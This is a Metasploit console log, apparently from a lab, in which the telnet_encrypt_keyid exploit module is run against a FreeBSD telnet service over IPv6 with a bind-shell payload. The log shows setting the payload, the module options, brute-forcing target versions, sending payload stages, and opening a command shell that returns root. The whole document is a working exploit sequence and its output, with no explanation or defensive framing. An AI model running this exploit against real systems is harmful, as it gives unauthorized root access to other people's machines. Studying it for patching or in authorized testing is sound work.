10.8.28.2 - (Sessions: 0 Jobs: 0) exploit(telnet_encrypt_keyid) > set
PAYLOAD bsd/x86/shell/bind_ipv6_tcp
PAYLOAD => bsd/x86/shell/bind_ipv6_tcp
10.8.28.2 - (Sessions: 0 Jobs: 0) exploit(telnet_encrypt_keyid) > show
options
Module options (exploit/freebsd/telnet/telnet_encrypt_keyid):
   Name      Current Setting           Required  Description
   ----      ---------------           --------  -----------
   PASSWORD                            no        The password
   RHOST     fe80::20c:29ff:fe4c:2f4d  yes       The target address
   RPORT     23                        yes       The target port
   USERNAME                            no        The username to authenticate

Payload options (bsd/x86/shell/bind_ipv6_tcp):
   Name   Current Setting           Required  Description
   ----   ---------------           --------  -----------
   LPORT  4444                      yes       The listen port
   RHOST  fe80::20c:29ff:fe4c:2f4d  no        The target address

Exploit target:
   Id  Name
   --  ----
   0   Automatic

10.8.28.2 - (Sessions: 0 Jobs: 0) exploit(telnet_encrypt_keyid) > exploit
[*] [2012.02.03-16:29:56] Started bind handler
[*] [2012.02.03-16:29:56] Brute forcing with 9 possible targets
[*] [2012.02.03-16:29:56] Trying target FreeBSD 8.2...
[*] [2012.02.03-16:29:56] FreeBSD/i386 (free.pwnme)
(ttyp0)\x0d\x0a\x0d\x0alogin:
[...]
[*] [2012.02.03-16:30:00] Sending first payload
[*] [2012.02.03-16:30:01] Sending second payload...
[*] [2012.02.03-16:30:01] Sending stage (46 bytes) to fe80::20c:29ff:fe4c:2f4d
[*] [2012.02.03-16:30:01] Trying target FreeBSD 7.0/7.1/7.2...
[*] Command shell session 1 opened (fe80::20c:29ff:fecf:6aba%eth0:45801 -> fe80::20c:29ff:fe4c:2f4d%eth0:4444) at 2012-02-03 16:30:02 +0100
id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)